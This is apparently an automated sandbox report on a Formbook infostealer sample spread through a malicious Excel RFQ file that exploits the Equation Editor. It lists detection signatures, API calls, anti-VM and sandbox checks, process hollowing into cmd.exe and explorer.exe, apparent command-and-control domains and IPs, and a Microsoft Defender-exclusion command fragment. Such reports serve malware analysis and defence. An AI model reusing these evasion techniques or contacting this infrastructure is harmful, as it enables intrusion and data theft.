            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exe - Code function: String function: 0095F970 appears 49 times
            Source: C:\Users\Public\vbc.exe - Code function: String function: 0093373B appears 148 times
            Source: C:\Users\Public\vbc.exe - Code function: String function: 00933F92 appears 66 times
            Source: C:\Users\Public\vbc.exe - Code function: String function: 008EDF5C appears 71 times
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: String function: 0226F970 appears 84 times
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: String function: 021FDF5C appears 119 times
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: String function: 021FE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: String function: 0224373B appears 245 times
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: String function: 02243F92 appears 132 times
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_004185F0 NtCreateFile,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_004186A0 NtReadFile,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_00418720 NtClose,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_00418642 NtCreateFile,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_0041869D NtReadFile,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_0041871A NtClose,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_004187CB NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E10D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E0060 NtQuerySection,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E01D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E1148 NtOpenThread,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DF8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008DF938 NtWriteFile,
            Source: C:\Users\Public\vbc.exe - Code function: 5_2_008E1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFAB8 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFAD0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021EFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_021F1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D8720 NtClose,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D8642 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D869D NtReadFile,
            Source: C:\Windows\SysWOW64\cmd.exe - Code function: 7_2_000D871A NtClose,
            Source: C:\Users\Public\vbc.exe - Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe - Memory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe - Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe - Memory allocated: 76E90000 page execute and read and write
            Source: vbc.exe.2.dr - Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc[1].exe.2.dr - Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: RFQ HCI20220113.xlsx - Virustotal: Detection: 33%
            Source: RFQ HCI20220113.xlsx - ReversingLabs: Detection: 30%
            Source: C:\Users\Public\vbc.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown - Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknown - Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe - Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\explorer.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File created: C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp
            Source: classification engine - Classification label: mal100.troj.expl.evad.winXLSX@7/18@9/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe - Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp - Binary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe - File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder - Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe - File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE - File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: vbc.exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: vbc[1].exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A6167 push 3A000004h; retf 0000h
Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A642A push es; retf
Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A7296 push FFFFFFA1h; iretd
Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A6AFF push es; iretd
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E6295 push edi; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB630 pushfd ; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB69C pushfd ; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB6E2 pushfd ; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B842 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B84B push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004188F2 push ds; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8AC push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00416109 push cs; iretd
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415237 pushfd ; iretd
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B7F5 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A6167 push 3A000004h; retf 0000h
Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A7296 push FFFFFFA1h; iretd
Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A6AFF push es; iretd
Source: C:\Users\Public\vbc.exe | Code function: 5_2_011A642A push es; retf
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D6109 push cs; iretd
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D5237 pushfd ; iretd
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB7F5 push eax; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB84B push eax; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB842 push eax; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DB8AC push eax; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D88F2 push ds; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.74258433139
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

            Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2548 | Thread sleep time: -38872s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1352 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1612 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 2812 | Thread sleep time: -34000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 38872
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022026F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B50 LdrLoadDll,
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.220 80
Source: C:\Windows\explorer.exe | Network Connect: 195.211.74.112 80
Source: C:\Windows\explorer.exe | Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe | Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe | Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe | Network Connect: 221.121.143.148 80
Source: C:\Windows\explorer.exe | Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe | Network Connect: 216.172.160.188 80
Source: C:\Windows\explorer.exe | Network Connect: 23.80.120.93 80
Source: C:\Windows\explorer.exe | Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe | Network Connect: 122.10.28.11 80
Source: C:\Windows\explorer.exe | Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe | Network Connect: 192.185.98.251 80
Source: C:\Windows\explorer.exe | Domain query: www.orphe.biz
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 49D90000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
